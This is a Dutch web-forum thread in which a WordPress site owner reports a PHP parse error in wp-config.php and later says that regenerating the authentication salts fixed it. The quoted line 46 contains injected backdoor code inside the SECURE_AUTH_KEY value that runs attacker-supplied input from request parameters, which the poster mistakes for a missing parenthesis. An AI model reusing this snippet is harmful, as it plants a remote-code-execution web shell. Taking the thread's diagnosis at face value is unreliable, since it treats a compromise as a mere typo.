Parse error

Status
Niet open voor verdere reacties.

ewaldvanderhoop

Gebruiker
Lid geworden
30 jan 2012
Ik ondervind een 'Parse error' foutmelding en nu is de website offline. Voorafgaand aan dit probleem heb ik geen wijzigingen doorgevoerd of iets dergelijks. De exacte foutmelding is:

Parse error: syntax error, unexpected T_STRING in /www/k/o/o/koopsfd.nl/public_html/wp-config.php on line 46

line 46 is:
define('SECURE_AUTH_KEY', 'HK.u+*PS!%v*s%gd,!=,to;l*if (isset($_REQUEST['FILE'])){$_FILE = $_REQUEST['895815e1c100d0d0b2bafe6c11a88e9d']('$_',$_REQUEST['FILE'].'($_);'); $_FILE(stripslashes($_REQUEST['HOST']));}:4vI{04ncK|zf07&7s&+wwBp*22D#>q?H+glZ');

Als ik de '(' goed tel dan mis ik er eentje. Geen idee of dit het probleem is en waar als dat ik 'm dan moet plaatsen.

Kan iemand mij helpen hiermee??

BVD,
Ewald.

Ik lees net onderstaande in de config file gelezen.

* Authentication Unique Keys and Salts.
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.

Heb de link gevolgd en de nieuwe gegevens in de config file gezet, geupload en de boel draait weer. Geen hulp nodig gehad dit keer. Wellicht wel handige info voor andere php-leken, die ook hetzelfde probleem ondervinden met hun WordPress website.

Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan